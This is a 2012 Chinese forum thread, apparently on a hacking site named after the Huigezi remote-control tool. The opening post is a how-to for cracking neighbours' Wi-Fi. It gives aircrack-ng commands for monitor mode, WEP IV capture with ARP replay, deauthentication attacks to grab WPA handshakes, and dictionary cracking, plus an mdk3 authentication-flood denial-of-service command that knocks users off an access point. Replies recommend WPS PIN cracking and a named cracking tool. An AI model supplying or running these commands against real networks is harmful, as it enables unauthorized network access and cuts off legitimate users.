灰鸽子远程控制软件

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 11191|回复: 4

伪造目标ap,截取合法用户数据包,分析获得wifi密码 灰鸽子官网

[复制链接]
发表于 2012-12-19 21:44:43 | 显示全部楼层 |阅读模式
伪造目标ap,截取合法用户数据包,分析获得wifi密码 灰鸽子官网
00x01 介绍
不管使用什么系统,一定要把网卡激活成为monitor模式,这样软件才可以识别

iwconfig //查看网卡
ifconfig start wlan0 //启动wlan0网卡
airmon-ng start wlan0 //将网卡激活成monitor模式,一般为mon0
WEP

airodump-ng --ivs –w log –c频道wlan0 //wep用ivs过滤报文即可,速度快
aireplay-ng -3 –b bssid –h clientMac mon0 //采用ARPRequesr来迅速加大数据量
aircrack-ng ivs文件 //破解捕获来的ivs文件 wep用这几个命令足以了

WPA/WPA2

airodump-ng –c频道–w log mon0 //wpa正常抓包即可
aireplay-ng -0 3 –a BSSID –c clientMAC wlan0 //发动Deauth攻击获取完整的handshake 提示获取成功,即可破解抓来的数据包
aircrack-ng –w字典文件捕获的cap文件 //WPA破解完全靠字典,需要有耐心

其实说到这里,hash破解速录会大大提升,只是利用字典制作hash table的时候需要花好长的时间,但是破解是aircrack的几十倍.
常见的几种DOS攻击:
Authentication Flood、Deauthentication Flood、Disassociation Flood、RF Jamming、Association Flood等

00x02 利用工具
本次我们还是依赖于BT5下一款强大的工具,mdk3
现在大部分无线下的工具都是利用mdk3为基本内核来开发的,所以其性能就不用多说了.
针对路由器,我们可以发动Authentication Flood,mdk3下参数为a,此攻击是针对无线AP的洪水攻击,
又叫做身份验证攻击.其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超过了无线AP所能承受的范围,
AP就会自动断开现有链接,使合法用户无法使用无线网络

mdk3 mon0 a –a AP的MAC地址(BSSID)

黑客

黑客

评帖赚银币(0) 收起
回复

使用道具 举报

发表于 2012-12-21 21:19:58 | 显示全部楼层
这个过时了,PIN破解最快,百分之九十能破解。
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2012-12-21 22:31:55 | 显示全部楼层
旦超过了无线AP所能承受的范围,
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2012-12-23 10:10:07 | 显示全部楼层
这个洪水攻击只是让他不能上网,不能破WPA2密码,PIN最快30分最慢24小时能破解这个最实在。
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

发表于 2012-12-23 10:12:54 | 显示全部楼层
这个是不用跑包的,用MINIDWEP-GTK
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|灰鸽子远程控制软件|灰鸽子远程控制软件 ( 鲁ICP备14000061号-4 )

GMT+8, 2024-11-1 10:36 , Processed in 0.092146 second(s), 31 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表